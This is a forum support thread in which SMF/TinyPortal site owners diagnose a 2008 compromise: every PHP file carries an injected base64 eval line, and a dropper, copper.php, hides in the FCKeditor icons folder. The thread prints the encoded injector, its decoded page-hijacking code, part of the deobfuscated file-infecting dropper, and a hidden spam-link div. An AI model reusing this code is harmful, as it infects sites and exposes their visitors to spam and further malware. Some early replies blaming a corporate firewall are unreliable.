8: Undefined index: dhhag

[FUBAR]

Link to my site:
SMF version: SMF ver. 1.1.6 (Upgraded tonight from 1.1.5)
TP version: TP v1.0.5 beta 1
Theme name and version: Default + All Others
Mods installed:
1.     SMF Poll Mod      1.2      
2.    SMF 1.0.14 / 1.1.6 Update    1.0    
4.    Users Online Today Mod    1.4.0    
5.    Auto Embed Video/Audio Clips    3.1.2    
6.    PM Popup - Uses Active Window    1.3    
7.    TinyPortal    1.052    
8.    SMF Gallery Lite    1.8.3    
9.    Ultimate Profile    0.8.5    
10.    Custom Profile Field Mod

Related Error messages:

8: Undefined index: dhhag
File: /home/website/public_html/forum/Themes/default/languages/Post.english.php (eval?)
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/default/languages/TPShout.english.php (eval?)
Line: 1

8: Undefined index: dhhag
/home/website/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php(1) : eval()'d code(1) : eval()'d code
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

8: Use of undefined constant port - assumed 'port'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

2: gzinflate() [<a href='function.gzinflate'>function.gzinflate[/url]]: buffer error
File: /home/website/public_html/forum/Themes/default/languages/Arcade.english.php (eval?)
Line: 1
I noticed recently that my error log is getting filled very quickly with these types of error's.  I haven't done anything new with my site for a while and it was error free last time I checked because everything was installed fresh.  I tried to run a search here and on SMF's site for similar errors but couldn't find anything related.  I actually have more variations of these errors but didn't want to fill the thread with all of them. 

Also note, I think all the error's have "Line: 1" at the end of them.

Please let me know if I can provide any more information and any help would be greatly appreciated.

[IchBin]

None of the errors look like they are TP related other than the path one. Even that one I doubt is related. The best thing you can do is start trouble shooting to see where they happen. If the error happens on every page you should look in the index.template.php. If it only happens on a single page, then you should look in the corresponding file for that page to see if you can find the same text.

[FUBAR]

I think I figured out what is creating these errors but have no idea how this happened.  I checked the .php files on my forum and entire site and found code added to EVERY .php file on my site.  It's the same code on every file and it's at the very top of the page.  The code is base64 and has to be decoded to be read properly and looks like this....

Code: [Select]

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdlmKGZpbGVfZXhpc3RzKCcvaG9tZS92b3dvZmF
wYS9wdWJsaWNfaHRtbC9mb3J1bS9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3Zvd29m
YXBhL3B1YmxpY19odG1sL2ZvcnVtL0ZDS2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ
1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZig
kZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDAp
LCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50L
UVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO
31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
When decoded it looks like this...

Code: [Select]

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
I'm not sure how this got added to every .php file on my site and have no idea how I could possibly fix this. 

Idea's on how this happened or any help would be greatly appreciated.

[Zetan]

Are you editing files behind a corporate firewall/proxy?

Those kind of errors can occur depending on the level of security. My company firewall will rip the code to shreads on a save. Example in part, Google Ad block (Scroll to the right):

Code: [Select]

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+/show_ads.js">
</script>

It's inserted a load of gobbledygook.. That may not be your problem, but it can happen depending on firewall settings. It doesn't look like a hacking attempt, those look more structured.

[G6Cad]

The debug code is used to verify that scripts used are valid.

The line 1 error makes me think you have a code added to any block or article ( probably article as the FCKEditor is involved some how )

What content have you added to your articles and blocks ? And where are you on the site when these errors show up ?

[FUBAR]

@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank.  I haven't edited any files directly but I have edited some of the blocks or modified theme files.  I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page. 

@G6 - These errors seem to happen on every page I'm on and I think it's because this code is on every file on my site.  The code that's added is in my previous post and it is added to every file but not the blocks or articles.

[Zetan]

@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank.  I haven't edited any files directly but I have edited some of the blocks or modified theme files.  I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page. 

 I would experiment, then you can establish whether the firewall is the cause.. If it is, there is nothing you can do about it, other than have fresh files and avoid editing while at work.

BTW.. Yr SACKED! 

[FUBAR]

Well I hope not.  lol 

I think I'm getting a little closer and found something else that seems a little odd.

I think I found some extra files in this directory...

/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32

Here's an image of the files...


The files have huge amounts of base64 code in them and some of it decodes similar to the errors I'm getting.

Code: [Select]

function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(file_exists($GLOBALS['dgcp'] . 'u')){ if(!$R399036803A841185E4A270BC666A66CF){ echo"stop flag ['u'] found<br>[465476673]"; } return; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgcp'].$GLOBALS['dgin'])){return;} touch($GLOBALS['dgcp'] . 'u'); $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)."<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path</b><br>[44883279]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path set to {$GLOBALS['dgcp']}</b><br>[5482745]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set name</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">name set to {$GLOBALS['dgin']}</b><br>[2246876]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgep\'] = "', '";', $GLOBALS['dgep'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to exploit successfully set to {$GLOBALS['dgep']}</b><br>[8799102]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}</b><br>[5893301]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgfxp\'] = "', '";', $GLOBALS['dgfxp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to the file for fix successfully set {$GLOBALS['dgfxp']}</b><br>[5018843]<br>"; } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); $RE477255A8507A54E5CA56CA24210B7DB = strval(strlen($RCFFAE742FB4E724571041779A10EFDA9)); while(strlen($RE477255A8507A54E5CA56CA24210B7DB) < 7){$RE477255A8507A54E5CA56CA24210B7DB = '0' . $RE477255A8507A54E5CA56CA24210B7DB;} if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '"00'.'0', '";', $RE477255A8507A54E5CA56CA24210B7DB)){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set size</b><br>[86612935]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"my packed size: $RE477255A8507A54E5CA56CA24210B7DB<br>"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgcp'].$GLOBALS['dgin'], $RCFFAE742FB4E724571041779A10EFDA9, "<b style=\"color:green\">{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b><br>", 1, $R399036803A841185E4A270BC666A66CF); if(!$R399036803A841185E4A270BC666A66CF){ echo "<h3>INJECTING PHP FILES</h3>"; } F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgdr'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); if($GLOBALS['dgsp']){ F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgsp'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); } F52293B786F39B90808D05A2530BA5100(1); if(!$R399036803A841185E4A270BC666A66CF){ echo "<hr><b>dgok</b>"; }}
I only decoded part of it because it's massive...

Do you think this is some type of hack?

[Zetan]

Well, I don't know.. other that what I already suggested. The files look as if they have been processed, firewalls do this to make dangerous scripts useless. They will often flag harmless scripts too. Like an over zealous antivirus program.

[FUBAR]

I just found this as well running a Google search on FCKeditor exploit.

http://securityreason.com/exploitalert/4572

Do you think this could be related? 

[Zetan]

Do you think this could be related? 

I'm no expert, but I don't think so. You can ask for support at the FCK forums, they do have one. While TP use the editor, we don't provide any support for it.

[G6Cad]

I will point Bloc to this topic so he can check it out.

[FUBAR]

One last thing I noticed was all the .php files on my site have been modified on the same date 18/09/2008.

I have not done any editing in a long time and there's no way I modified every php file on the same day.  So this must be the day my site was hacked or when this happened.

Thanks again for the help.

[Zetan]

  So this must be the day my site was hacked or when this happened.

So your site has been hacked? If thats the hack, it serves no purpose that I can see.

[dafunky]

Hello, I'm encountering similar errors...

Link to my site: http://www.motostrada.fr/forum

SMF version: SMF ver. 1.1.6 (Upgraded recently from 1.1.5)
TP version: TP v0.9.8
Theme name : New Damage
Mods installed:

1.    SMF 1.0.14 / 1.1.6 Update   
2.    TinyPortal    0.9.8   


Related Error messages:

8: Undefined index: dhhag
Fichier: /forum/Themes/Aa_New_Damage_1/Display.template.php (eval?)
Ligne: 1

8: Undefined index: dhhag
Fichier: /forum/Themes/default/Printpage.template.php (eval?)
Ligne: 1

8: Undefined index: dhhag
Fichier: /forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php(1) : eval()'d code(1) : eval()'d code
1

Thanks for your help, I can't say when it appeared...

[IchBin]

Looks like an exploit to me. If all your files have been touched at the same time and have the same code in it, it definitely sounds like an exploit. Whether it is in the the editor or some where else remains to be seen. You need to ask your host for more info and give them the date that it happened. Ask them to look into it as well.

[FUBAR]

@ dafunky - Can you check and see if all of your .php files on your site have been modified.  You should see a large portion of code at the top of all the.php files above the <?php. 

To check what day you could FTP to your site and see when the files were modified. 

If this code has been added to your pages as well then it's most definitely an exploit.

@ IchBin - I'll let me host know about it tonight and see what they say or can do.

[dafunky]

Yes, I can confirm that I can see the same code than your in the header of my php files.
OVH is my host.

[FUBAR]

Ok, so it's not just me.  Thanks for looking into that DaFunky.

I just got off the phone with my host and should be able to run a backup from Sept 11.  I don't think this exploit has affected my database and would like to restore my posts and members registered after the backup is completed.  

If this is something I should direct to SMF I can post this there.  
  
Edit: Also just noticed my error log is 12,000 pages long and it was just cleared last night.  LOL

[IchBin]

You need to try and get the information from your host on where/what/when/how the exploit happened. And whether this exploit touched your database or not, make sure you change your password for the database as it could have been compromised. If your host blames SMF, then submit a security report to SMF and give them your access logs for your site.

[FUBAR]

I've been in contact with my host twice today. They have just redirected me to  to the provider of the original script that was exploited (SMF).  I asked if they could give me any info on who/when/how and they said it's beyond their scope. 

Do you know if the FCKeditor is part of SMF or TinyPortal?

[G6Cad]

What host do you have ?  An answer like that from them would make me change host.
It's in their interest to find out more instead of sending you to other places.

Tell them you need the info to file a hack report on SMF

[IchBin]

If you're host is blaming SMF, then they should be able to tell you why. Othewise, the proof is in the pudding. They need to show you how it happened or at least give you some information on how they "think" it happened. I'm with G6 here, any host worth their money should be able to tell you what happened.

[FUBAR]

I do agree with both of you and think they should have been able to give me more information.  Although, I can't really expect them to be on top of every exploit out there either.  I've been with them for a long time and have received good service in the past. 

In the mean time I've run a backup on my forum and deleted the files from this post prior to running the backup.  I'm sure it's these file that created the issue because I tried running a backup with these files still on the host and the problem happened again.  (I forgot to delete them the first time,  ) 

After I deleted the files and uploaded my backup, my forum seems to be running fine and error free. 

I just have to backup my other php scripts as well because those files were affected as well.

----------------------------

As to the exploit, I think it's because either Tinyportal or SMF is running an outdated version of the FCKeditor which is version 2.3.2 Build 1082.  The current version is Version 2.6.3 and has "Important security fixes have been applied to the File Manager, Uploader and Connectors. Upgrade is highly recommended.".

Thanks again for the help ZTM, IchBin and G6.

[IchBin]

I don't expect them to know every exploit either. But I do expect them to actually find out why their servers have been compromised. Ambiguously blaming a piece of software without anything to back it up is ignorant.

Personally, I don't use any editors. But yes, I agree it sounds like an editor exploit which could be fixed possibly by updating the FCK editor. I'm not sure if TP modifies any of the files though, so I'm not sure if you could just arbitrarily put the new version in place without having to modify anything.

[supert3d]

Heya guys,

Just to give you an update. I got hit with exactly the same problem. Every PHP page on my domain has been injected with base64 code.

I decoded it here so people can see what it is doing. (It echo() now and doesn't eval(), so no code is executed).

You will note it that it modifies this file :
/js/tinymce/themes/advanced/images/xp/js.php

On opening this file I note that it has been completely modified to base64, some 1000 lines, and has been base64_encode() twice for obscurity. I have decoded it to here.

Note the line "INJECTING PHP FILES". This is quite blatantly an exploit. It's my own fault. I was running an older version of Wordpress on my sisters website that no doubt is using an older version of the TinyMCE WYSIWYG.

Just be warned !

[TinkyWinky]

Hello everybody
I have just registered here because I have the same problem: copper.php, one injected line in every .php file and thousands of files with html code witch are included in every my page. These files contain spam links (viagra, porn...) and these links are all invisible to visitors of site but when I look "view page source" they are there in "invisible" div tag:

Code: [Select]

<div style="position:absolute;left:-74402px;top:-56110px">
I deleted all these files but first line (base64 code) of all my .php files should also be deleted and it's a big job. Do you have any idea how could I do it?

[IchBin]

You'd have to write some sort of script to go through and open the files, and then delete the offending lines that you don't want there any more. It really is out of scope for this site as we are not a server scripting site. Best thing you could do is restore from a backup that is not infected.